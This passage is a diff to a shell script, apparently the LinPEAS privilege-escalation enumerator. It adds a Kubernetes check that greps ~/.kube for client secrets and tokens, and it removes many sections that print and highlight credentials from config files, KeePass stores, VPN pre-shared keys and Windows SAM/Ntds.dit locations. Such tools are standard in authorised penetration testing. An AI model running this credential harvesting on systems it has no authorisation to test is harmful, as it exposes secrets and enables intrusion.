"$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do ls -ld "$f" | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +if [ -d "$HOME/.kube" ] || [ -d "/etc/kubernetes" ] || [ -d "/var/lib/localkube" ] || [ "`(env | set) | grep -Ei 'kubernetes|kube' | grep -v "PSTORAGE_KUBELET|USEFUL_SOFTWARE"`" ] || [ "$DEBUG" ]; then + print_2title "Kubernetes information" | sed -${E} "s,config,${SED_RED}," + ls -l "$HOME/.kube" 2>/dev/null + grep -ERH "client-secret:|id-token:|refresh-token:" "$HOME/.kube" 2>/dev/null | sed -${E} "s,client-secret:.*|id-token:.*|refresh-token:.*,${SED_RED}," + (env || set) | grep -Ei "kubernetes|kube" | grep -v "PSTORAGE_KUBELET|USEFUL_SOFTWARE" | sed -${E} "s,kubernetes|kube,${SED_RED}," + ls -Rl /etc/kubernetes /var/lib/localkube 2>/dev/null +fi - - print_2title "Analyzing Chrome Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then echo_not_found "google-chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then echo_not_found "Chrome"; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "Chrome$" | while read f; do ls -ld "$f" | sed -${E} "s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - - - print_2title "Analyzing Autologin Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then echo_not_found "autologin"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then echo_not_found "autologin.conf"; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; - - - #-- SI) S/Key athentication - print_2title "S/Key authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then - printf "System supports$RED S/Key$NC authentication\n" - if ! [ -d /etc/skey/ ]; then - echo "${GREEN}S/Key authentication enabled, but has not been initialized" - elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then - echo "${RED}/etc/skey/ is writable by you" - ls -ld /etc/skey/ - else - ls -ld /etc/skey/ 2>/dev/null - fi - fi - echo "" - - #-- SI) YubiKey athentication - print_2title "YubiKey authentication" - if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then - printf "System supports$RED YubiKey$NC authentication\n" - if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then - echo "${RED}/var/db/yubikey/ is writable by you" - ls -ld /var/db/yubikey/ - else - ls -ld /var/db/yubikey/ 2>/dev/null - fi - fi - echo "" - - #-- SI) Passwords inside pam.d - print_2title "Passwords inside pam.d" - grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," - echo "" - - - - print_2title "Analyzing SNMP Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then echo_not_found "snmpd.conf"; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Pypirc Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then echo_not_found ".pypirc"; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Postfix Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then echo_not_found "postfix"; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f" | sed -${E} "s,postfix$,${SED_RED},"; for ff in $(find "$f" -name "master.cf"); do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing Ldaprc Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then echo_not_found ".ldaprc"; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Env Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then echo_not_found ".env"; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Msmtprc Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then echo_not_found ".msmtprc"; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Keepass Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then echo_not_found "*.kdbx"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then echo_not_found "KeePass.config*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then echo_not_found "KeePass.ini"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then echo_not_found "KeePass.enforced*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; - - - print_2title "Analyzing FTP Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then echo_not_found "*.ftpconfig"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then echo_not_found "ffftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then echo_not_found "ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then echo_not_found "ftp.config"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.config$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"sites\.ini$\"`" ]; then echo_not_found "sites.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"wcx_ftp\.ini$\"`" ]; then echo_not_found "wcx_ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"winscp\.ini$\"`" ]; then echo_not_found "winscp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then echo_not_found "ws_ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; - - - print_2title "Analyzing Racoon Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then echo_not_found "racoon.conf"; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ]; then echo_not_found "psk.txt"; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Opera Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_OPERA\" | grep -E \"com\.operasoftware\.Opera$\"`" ]; then echo_not_found "com.operasoftware.Opera"; fi; printf "%s" "$PSTORAGE_OPERA" | grep -E "com\.operasoftware\.Opera$" | while read f; do ls -ld "$f" | sed -${E} "s,com\.operasoftware\.Opera$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - - - print_2title "Analyzing Safari Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SAFARI\" | grep -E \"Safari$\"`" ]; then echo_not_found "Safari"; fi; printf "%s" "$PSTORAGE_SAFARI" | grep -E "Safari$" | while read f; do ls -ld "$f" | sed -${E} "s,Safari$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - - - print_2title "Analyzing Bind Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_BIND\" | grep -E \"bind$\"`" ]; then echo_not_found "bind"; fi; printf "%s" "$PSTORAGE_BIND" | grep -E "bind$" | while read f; do ls -ld "$f" | sed -${E} "s,bind$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "*.key"); do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing SeedDMS Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then echo_not_found "seeddms*"; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep -E "seeddms.*$" | while read f; do ls -ld "$f" | sed -${E} "s,seeddms.*$,${SED_RED},"; for ff in $(find "$f" -name "settings.xml"); do ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing Ddclient Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then echo_not_found "ddclient.conf"; fi; printf "%s" "$PSTORAGE_DDCLIENT" | grep -E "ddclient\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*password.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Sentry Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry$\"`" ]; then echo_not_found "sentry"; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry$" | while read f; do ls -ld "$f" | sed -${E} "s,sentry$,${SED_RED},"; for ff in $(find "$f" -name "config.yml"); do ls -ld "$ff" | sed -${E} "s,config.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,*key*,${SED_RED},g"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry\.conf\.py$\"`" ]; then echo_not_found "sentry.conf.py"; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry\.conf\.py$" | while read f; do ls -ld "$f" | sed -${E} "s,sentry\.conf\.py$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Strapi Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_STRAPI\" | grep -E \"environments$\"`" ]; then echo_not_found "environments"; fi; printf "%s" "$PSTORAGE_STRAPI" | grep -E "environments$" | while read f; do ls -ld "$f" | sed -${E} "s,environments$,${SED_RED},"; for ff in $(find "$f" -name "custom.json"); do ls -ld "$ff" | sed -${E} "s,custom.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "database.json"); do ls -ld "$ff" | sed -${E} "s,database.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "request.json"); do ls -ld "$ff" | sed -${E} "s,request.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "response.json"); do ls -ld "$ff" | sed -${E} "s,response.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "security.json"); do ls -ld "$ff" | sed -${E} "s,security.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "server.json"); do ls -ld "$ff" | sed -${E} "s,server.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing Cacti Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CACTI\" | grep -E \"cacti$\"`" ]; then echo_not_found "cacti"; fi; printf "%s" "$PSTORAGE_CACTI" | grep -E "cacti$" | while read f; do ls -ld "$f" | sed -${E} "s,cacti$,${SED_RED},"; for ff in $(find "$f" -name "config.php"); do ls -ld "$ff" | sed -${E} "s,config.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "config.php.dist"); do ls -ld "$ff" | sed -${E} "s,config.php.dist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "installer.php"); do ls -ld "$ff" | sed -${E} "s,installer.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";for ff in $(find "$f" -name "check_all_pages"); do ls -ld "$ff" | sed -${E} "s,check_all_pages,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing Roundcube Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ROUNDCUBE\" | grep -E \"roundcube$\"`" ]; then echo_not_found "roundcube"; fi; printf "%s" "$PSTORAGE_ROUNDCUBE" | grep -E "roundcube$" | while read f; do ls -ld "$f" | sed -${E} "s,roundcube$,${SED_RED},"; for ff in $(find "$f" -name "config.inc.php"); do ls -ld "$ff" | sed -${E} "s,config.inc.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "config\[" | sed -${E} "s,db_dsnw,${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing Passbolt Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then echo_not_found "passbolt.php"; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; - - - - - print_2title "Analyzing Interesting logs Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then echo_not_found "access.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then echo_not_found "error.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; - - - print_2title "Analyzing Windows Files Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.inf$\"`" ]; then echo_not_found "unattend.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"\.rdg$\"`" ]; then echo_not_found "*.rdg"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "\.rdg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"AppEvent\.Evt$\"`" ]; then echo_not_found "AppEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ConsoleHost_history\.txt$\"`" ]; then echo_not_found "ConsoleHost_history.txt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ConsoleHost_history\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then echo_not_found "FreeSSHDservice.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"NetSetup\.log$\"`" ]; then echo_not_found "NetSetup.log"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"Ntds\.dit$\"`" ]; then echo_not_found "Ntds.dit"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "Ntds\.dit$" | while read f; do ls -ld "$f" | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"protecteduserkey\.bin$\"`" ]; then echo_not_found "protecteduserkey.bin"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "protecteduserkey\.bin$" | while read f; do ls -ld "$f" | sed -${E} "s,protecteduserkey\.bin$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"RDCMan\.settings$\"`" ]; then echo_not_found "RDCMan.settings"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SAM$\"`" ]; then echo_not_found "SAM"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SAM$" | while read f; do ls -ld "$f" | sed -${E} "s,SAM$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SYSTEM$\"`" ]; then echo_not_found "SYSTEM"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SYSTEM$" | while read f; do ls -ld "$f" | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SecEvent\.Evt$\"`" ]; then echo_not_found "SecEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SecEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,SecEvent\.Evt$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"appcmd\.exe$\"`" ]; then echo_not_found "appcmd.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "appcmd\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,appcmd\.exe$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"bash\.exe$\"`" ]; then echo_not_found "bash.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "bash\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,bash\.exe$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"datasources\.xml$\"`" ]; then echo_not_found "datasources.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "datasources\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,datasources\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"default\.sav$\"`" ]; then echo_not_found "default.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "default\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,default\.sav$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"drives\.xml$\"`" ]; then echo_not_found "drives.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "drives\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,drives\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"groups\.xml$\"`" ]; then echo_not_found "groups.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "groups\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,groups\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https-xampp\.conf$\"`" ]; then echo_not_found "https-xampp.conf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https-xampp\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https-xampp\.conf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https\.conf$\"`" ]; then echo_not_found "https.conf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https\.conf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"iis6\.log$\"`" ]; then echo_not_found "iis6.log"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "iis6\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,iis6\.log$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"index\.dat$\"`" ]; then echo_not_found "index.dat"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "index\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,index\.dat$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.cnf$\"`" ]; then echo_not_found "my.cnf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.cnf$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.ini$\"`" ]; then echo_not_found "my.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ntuser\.dat$\"`" ]; then echo_not_found "ntuser.dat"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ntuser\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,ntuser\.dat$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"pagefile\.sys$\"`" ]; then echo_not_found "pagefile.sys"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "pagefile\.sys$" | while read f; do ls -ld "$f" | sed -${E} "s,pagefile\.sys$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"php\.ini$\"`" ]; then echo_not_found "php.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "php\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,php\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"printers\.xml$\"`" ]; then echo_not_found "printers.xml"; fi; printf 